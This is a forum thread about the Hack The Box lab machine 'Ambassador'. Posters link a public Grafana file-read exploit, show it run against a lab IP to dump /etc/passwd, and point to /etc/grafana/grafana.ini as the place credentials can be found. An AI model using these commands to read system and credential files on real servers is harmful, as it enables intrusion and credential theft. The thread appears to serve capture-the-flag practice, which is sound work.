Ambassador - HTB [Discussion]

There is an information leakage, a small leak from a supposedly valid user at the system level, developer

This Grafana exploit works: https://www.exploit-db.com/exploits/50581

python exploit.py -H http://10.129.xxx.xxx:3000
Read file > /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...

Grafana creds are in /etc/grafana/grafana.ini

(October 1, 2022, 07:46 PM)11231123 Wrote: Grafana creds are in /etc/grafana/grafana.ini

how did you find it?

(October 1, 2022, 07:48 PM)araaraara Wrote:

(October 1, 2022, 07:46 PM)11231123 Wrote: Grafana creds are in /etc/grafana/grafana.ini

how did you find it?

check this
https://www.exploit-db.com/exploits/50581
```
python3 50581.py
Read file > /etc/grafana/grafana.ini
```

I don't know if I'm the only one who gets an error with the script?```File "", line 1/etc/passwd```someone help me to solve this?

(October 1, 2022, 08:08 PM)coder1777 Wrote: I don't know if I'm the only one who gets an error with the script?
```
File "<string>", line 1
/etc/passwd
```
someone help me to solve this?

Just look at the code and manually craft the url. Its pretty simple

(October 1, 2022, 07:48 PM)araaraara Wrote:

(October 1, 2022, 07:46 PM)11231123 Wrote: Grafana creds are in /etc/grafana/grafana.ini

how did you find it?

its in documentary just google for grafana passwords and it will be somewhere on first page

(October 1, 2022, 08:10 PM)snowmanballs Wrote:

(October 1, 2022, 08:08 PM)coder1777 Wrote: I don't know if I'm the only one who gets an error with the script?
```
File "<string>", line 1
/etc/passwd
```
someone help me to solve this?

Just look at the code and manually craft the url. Its pretty simple

thanks